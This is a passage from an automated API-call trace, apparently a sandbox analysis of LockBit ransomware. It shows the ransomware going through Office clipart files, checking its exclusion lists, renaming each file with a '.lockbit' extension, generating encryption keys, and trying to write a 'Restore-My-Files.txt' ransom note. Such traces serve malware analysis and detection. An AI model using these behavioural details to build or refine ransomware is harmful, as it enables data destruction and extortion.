[0138.625] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.625] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.626] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.626] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105288.WMF") returned 1 [0138.626] lstrcmpiW (lpString1="ntldr", lpString2="J0105288.WMF") returned 1 [0138.626] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105288.WMF") returned 1 [0138.627] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105288.WMF") returned -1 [0138.627] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105288.WMF") returned -1 [0138.627] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105288.WMF") returned 1 [0138.627] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105288.WMF") returned -1 [0138.627] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.627] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned=".WMF" [0138.627] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.627] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.627] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.638] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.639] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.639] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.639] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.639] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF.lockbit") returned 72 [0138.639] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.640] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.640] malloc (_Size=0x40068) returned 0x3df0008 [0138.640] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15832) returned 1 [0138.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.641] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.642] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.642] malloc (_Size=0xa6) returned 0x77d7a8 [0138.642] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.643] free (_Block=0x77d7a8) [0138.643] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.643] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.643] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.643] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3a14, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105292.WMF", cAlternateFileName="")) returned 1 [0138.644] lstrcmpiW (lpString1=".", lpString2="J0105292.WMF") returned -1 [0138.644] lstrcmpiW (lpString1="..", lpString2="J0105292.WMF") returned -1 [0138.644] PathFindExtensionW (pszPath="J0105292.WMF") returned=".WMF" [0138.644] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.644] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.645] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.645] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105292.WMF") returned 1 [0138.645] lstrcmpiW (lpString1="ntldr", lpString2="J0105292.WMF") returned 1 [0138.645] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105292.WMF") returned 1 [0138.645] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105292.WMF") returned -1 [0138.645] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105292.WMF") returned -1 [0138.645] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105292.WMF") returned 1 [0138.645] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105292.WMF") returned -1 [0138.645] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.645] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned=".WMF" [0138.645] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.646] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.646] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.646] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF.lockbit") returned 72 [0138.646] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.647] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.647] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.647] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14868) returned 1 [0138.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.648] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.651] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.652] malloc (_Size=0xa6) returned 0x77d7a8 [0138.652] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.652] free (_Block=0x77d7a8) [0138.652] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.652] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.652] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.653] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1580, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105294.WMF", cAlternateFileName="")) returned 1 [0138.653] lstrcmpiW (lpString1=".", lpString2="J0105294.WMF") returned -1 [0138.653] lstrcmpiW (lpString1="..", lpString2="J0105294.WMF") returned -1 [0138.653] PathFindExtensionW (pszPath="J0105294.WMF") returned=".WMF" [0138.653] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.653] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.654] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.654] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105294.WMF") returned 1 [0138.655] lstrcmpiW (lpString1="ntldr", lpString2="J0105294.WMF") returned 1 [0138.655] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105294.WMF") returned 1 [0138.655] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105294.WMF") returned -1 [0138.655] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105294.WMF") returned -1 [0138.655] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105294.WMF") returned 1 [0138.655] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105294.WMF") returned -1 [0138.655] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.655] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned=".WMF" [0138.655] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.655] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.655] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.656] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.656] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF.lockbit") returned 72 [0138.656] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.657] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.657] malloc (_Size=0x40068) returned 0x3d70450 [0138.657] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5504) returned 1 [0138.657] LoadLibraryA 